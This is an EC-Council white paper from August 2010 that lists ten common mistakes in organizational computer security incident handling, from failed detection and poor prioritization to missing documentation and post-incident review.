Ten Deadly Sins in Incident Handling August 2010 Ten Deadly Sins of Incident Handling A secured environment is crucial for business continuity. However, incidents are bound to happen. Appropriate incident handling processes ensure prevention of security threats as well as timely identification and mitigation. This article delves into the ten deadly sins of incident handling. 1. Introduction Risks are inherent to the Internet environment. The security threat profile of cyber space in general, has increased over the past several years. Threats have become more sophisticated, frequent and damaging. Cybercrime has become a key component for organized crime. Cybercriminals take advantage of system and network vulnerabilities by probing, intruding, and attacking to damage, alter or steal information. The type of chaos caused by cyber-attacks includes denial of service, unauthorized intrusions, virus, Trojan attacks and malicious mails. Organizations do take preventive measures such as proper authorization and encryption mechanisms, regular updates, anti-virus solutions and user awareness. Of Course, it is not possible to prevent all security incidents. Hackers manage to find vulnerabilities in security products and in the network infrastructure. Therefore, the “response,” better known as “incident handling,” plays a major role in network defense. 1.1 Incident Handling Any unusual activity in a system or network may be cause for alarm. For example, an employee may find an anomaly in the functioning of an application, or an intrusion detection tool may indicate a suspicious activity in the network. These unusual activities are better known as “events.” These are they types of events that may lead to a security incident. Incidents are interruptions caused by adverse events, which result in any violation of standard security policies. Adverse events such as unauthorized access, system crash, and malicious code execution, denial of service and unauthorized use of resources may result in a change in the normal functioning of the computer systems and/or network. An incident1 in the form of a virus attack, unauthorized access or an illegal activity by an insider requires a specific, “appropriate” response. Incident handling refers to set of procedures, measures and actions initiated to detect, analyze, respond, prevent and limit further damage. Incident response should be an integral part of any information security policy of an organization. The incident handling process involves preparation, detection, analysis, containment, recovery and post-incident 1 The word ‘Incident’ used in this paper refers to computer security incidents. Page | 1 © Copyright EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Ten Deadly Sins in Incident Handling August 2010 analysis. An organization may have single or multiple incident handling and response teams Page | 2 © Copyright EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Ten Deadly Sins in Incident Handling August 2010 2. Ten deadly sins in Incident handling Incident response makes the difference between recovery and disaster. Here are the ten deadly sins in incident handling: i. Failure to identify/detect an incident As discussed earlier, adverse events may lead to an incident. However, hackers make changes in their modus-operandi from time to time to by-pass detection. Intrusion detection tools may not detect all anomalies in systems and network2. If you do not update the anti-virus software regularly, it may not detect a new form of virus that may have breached the system security. A user may ignore a suspicious activity. Sometimes, intrusion detection tools may raise false positives3. For instance, a high CPU utilization for few minutes or misconfigured system may lead to false alarm, while there may be no threat. The reasons sited above are only a few reasons why incident handling is one of the most challenging tasks to be addressed by the response team. However, an incident handling team should be able to outline procedures to identify common or recurring incidents. Incident detection plays a crucial role in determining an appropriate response, and failure to detect an incident increases vulnerability of systems and networks, which of course leads to grave cost implications. An incident handling team can examine various potential threat indicators such as virus detection, multiple failed login attempts, slow Internet connectivity and poor system performance to detect possible incidents. A person can use threat indicators to connect different, seemingly unrelated events. For example, new files with unusual names may indicate attempts to gain unauthorized access to compromise the victim machine, or unusual messages or graphics on a computer screen may indicate malicious code attack. The incident handling team should utilize announcements regarding new vulnerabilities or new forms of attacks to examine their own system and network vulnerabilities to assure that they are fortified to withstand these new threats. ii. Lack of incident prioritization Security incidents may differ in severity, therefore it is important to prioritize incidents for better management of the incident handling process and timely restoration of business operations. Incident prioritization enables the assignment of a particular incident to the correct response team. Incidents may also affect the service level agreements of the business because non-availability of a service to customers for more than their contract’s allowable period could attract penalties to the organization. Lack of incident prioritization may lead to improper reporting of the incident or a delay in remedial measures and restoration. 2 Failure to detect an actual attack is termed as False negative 3 False positives refer to events where an alarm is raised, even when there are no threats Page | 3 © Copyright EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Ten Deadly Sins in Incident Handling August 2010 Prioritization of incidents could be based on: a. The criticality of the targeted resource b. Impact of incident on current business operations c. Potential long-term impact on business operations d. Possible leakage of privileged confidential business data. e. Urgency of resolution f. Possible breach of service level agreements g. Impact on business reputation h. Resources required to fix the vulnerabilities i. Cost of non-resolution to business, loss of revenue. Incident prioritization helps in better reporting, timely action, appropriate resource allocation, and the protection of evidence. Incident prioritization also helps in the timely reporting of an incident to the appropriate internal and external authorities. iii. Miscommunication It is important to communicate an incident/security breach to various internal and external stakeholders. However, it is also crucial to have a proper communication policy to avoid miscommunication. Communication to internal and external agencies would depend on the severity of the incident and its impact on business operations. Announcing an attack to all employees may alert the intruder and cause them to destroy the evidence. (If he/she is an insider.) Confronting an attacker whom you think is responsible for the possible incident may trigger an alarm for his accomplices in the crime, thereby losing the “trail of event,” which could have helped you to bring legal action against the intruder. The first objective of the incident handling team must be to control the incident. Listed below are some of the precautions that the personnel within the incident handling team needs to take while communicating an incident to other parties. a. Identify the different stakeholders to be notified - Management, law enforcement authorities, customers, media, general public, management, IT department, human resource manager, security experts. b. Take the advice of legal counsel before notifying law enforcement authorities. c. Communicate with media through public relations officer. d. Alert customers only if threat is substantial. It is crucial to avoid panic among customers, which could hamper incident-handling process. iv. Not isolation of the infected device/system One of the important decisions faced by the incident response team is whether to continue the operations of the infected system or to isolate the system from the Page | 4 © Copyright EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Ten Deadly Sins in Incident Handling August 2010 network. In some cases, an organization may continue to use the infected machine to ensure operational continuity. However, an infected system may affect other systems in the network. The infected system may even serve as a vector to launch an attack on other systems on the network. Therefore, it is important to isolate the infected system from the network to protect the network from virus or malicious code. To ensure business continuity it is advisable to keep redundant backup of the critical systems to ensure uninterrupted business service in case the primary system is affected. v. Inappropriate Log analysis Reviewing log files is one of the ways to detect transmission of malicious code. However, one of the common mistakes made by incident handling teams is to look for only those log lines considered suspicious by the organization. Some of the log analysis tools filter only defined attack signatures and events from the logs. To only search for pre-defined events is an approach that will not detect novel forms of attack or malicious behavior. Log mining is one of the ways to recognize incidents, and can be a key factor in detecting patterns of events. Log mining facilitates segmentation for easier identification. For example, one the incident team members can segment the logs based on user search, browse history, and user browse patterns. vi. Restoration of operations without eradicating vulnerability Incident identification and eradication are important functions of an incident handling team. However, at times while the organization is in a hurry to restore business operations, they may choose to restore the affected system without eradicating the cause of the incident. This practice increases the chance that the incident will reoccur. Therefore, before restoring operations, it is important to control the damage caused by the attack. Possible attacks can be discovered by identifying the cause and symptoms of the incident. It is important to examine and remove any possible vulnerability that could be exploited by a malicious hacker. For example, if the incident team encounters an incident that involves user-level access compromised by a brute force attack, then it is important that they: a. change the user password, b. educate the user for stronger password, c. encourage stronger password usage among all users, d. review or update the password policy in accordance with industry accepted standards, e. check for contaminated files in user account, f. find vulnerabilities, and g. Update the anti-virus system. Page | 5 © Copyright EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Ten Deadly Sins in Incident Handling August 2010 It is also important to identify the loopholes in the security infrastructure and strengthen the defenses in accordance with the latest security updates. A clean backup can help in restoring the system. The incident team may also decide to rebuild a fresh system by installing new hardware and software. It is important to secure the restored system to curtail further attacks. vii. Inadequate training and lack of skilled and certified personnel Threats in the cyber space have become more complicated. Hackers can exploit vulnerabilities in network security devices and software programs. They can also exploit user’s actions. Essentially, hackers can exploit a multitude of attack vectors, attack types and vulnerabilities. Lack of adequate skills and technical expertise may result in mishandling of incident, loss of evidence, inappropriate response and complications. Personnel within the incident handling team must be able to recognize intrusion techniques and different forms of attacks. They must be able to detect and analyze intrusions as well as possess knowledge of network devices, operating systems and applications. The Incident handling team must have personnel skilled in varied domains such as: a. Network and system security b. Software engineering c. Programming skills d. Language scripting e. Forensics f. Vulnerability assessment g. Penetration testing The incident handling team must also have knowledge of the various tools and techniques used in vulnerability assessments, and should keep themselves updated with the latest events related to information security. It is also important that this team is aware of the new vulnerabilities that have been discovered among other incident response teams. Excellent communication, problem-solving and time management skills are mandatory for personnel within the incident handling team. Regular training sessions, e-learning programs and workshops may be required to supplement the skills of the team members. viii. Not reviewing incident response or non-validation Incident response process includes taking the necessary steps to restore the normal operations after an adverse event or incident. Once the incident is contained, the affected systems should be recovered . It is important to review the entire incident response process. Response review should assess: a. Incident response plan – whether preparation was adequate. b. Steps taken by the team were in accordance with plan, was any flexibility required. Page | 6 © Copyright EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Ten Deadly Sins in Incident Handling August 2010 c. Successful and failed steps, success in containing the incident d. Promptness of response, cause for delays e. If appropriate communication was made and stakeholders notified f. Challenges faced g. Resources used – was there a need for additional resources h. Level of management support i. Areas for improvement – (skills, training requirements, procedures,) Documentation is crucial at all phases of the incident handling and response process. Team members must document all activities, evidence collected, vulnerabilities and responses during the course of preparation, detection, analysis, containment, recovery and post-incident analysis. A thorough review of the incident response is recommended to ensure prevention of errors and better preparedness. Reviews also enable development of appropriate response procedures. Lessons learned from the incident handling and response process will help to devise better plans and procedures and incorporate new tools and techniques ix. Lack of proper coordination with other stakeholders Appropriate coordination between various stakeholders and the incident handling team is crucial to ensure a successful incident response process. Lack of proper coordination may result in chaos, duplication of tasks and delay in the incident response process. Various stakeholders include: users, system administrators, network operations, information security officers, chief information officer, other incident response teams, human resources, public relations officer, legal departments, and law enforcement agencies. Proper coordination between the incident response team and the public relations officer is crucial for an appropriate and timely communication of an adverse event to media and/or customers. Cooperation with the human resources department is also crucial to ensure timely action against an internal intruder. Some of the incidents may require escalation to higher authorities such as the Chief Information Officer or the Chief Information Security Officer for timely action. x. Lack of documentation and implementation of standard incident handling and response procedures Incident handling and response is a planned process that requires incident detection, analysis, eradication and recovery within stipulated deadlines. Therefore, it is important to have a standard set of procedures, which could facilitate timely intervention to control any adverse event. A standard operating procedure should: a. Define an incident and indicate common incidents related to systems, network, user accounts, files and folders. Page | 7 © Copyright EC-Council All Rights Reserved. Reproduction is Strictly Prohibited Ten Deadly Sins in Incident Handling August 2010 b. Suggest procedures for reporting an incident and the contact details of appropriate authorities. c. Define roles and responsibilities of users, system administrators, Information security officer and incident response teams. d. Mention contact details of incident response teams, management, vendors, suppliers, law enforcement authorities, legal team and human resource team and other requisite teams. e. Have procedures to categorize incidents in terms of their severity, business impact and violation of law. f. Indicate procedures for incident escalation and notification. Instances of criminal activity and likely breach of service level agreements may require escalation to higher authorities. g. Indicate precautions for handling and protecting evidence. h. Indicate precautions in dealing with data, systems, applications and network to prevent or minimize incidents. i. Prescribe checklist for dealing with commonly known cyber threats and incidents. 3. Conclusion Incident handling is crucial to prevent, detect and mitigate cyber threats in an organization. Proper procedures must be in place for timely detection and resolution of an incident. An appropriate incident handling plan must devise effective mechanisms to prevent cyber threats. It is recommend that organizations incorporate incident handling as an integral part of their information security policy to ensure minimum disruptions in business activities. Page | 8 © Copyright EC-Council All Rights Reserved. Reproduction is Strictly Prohibited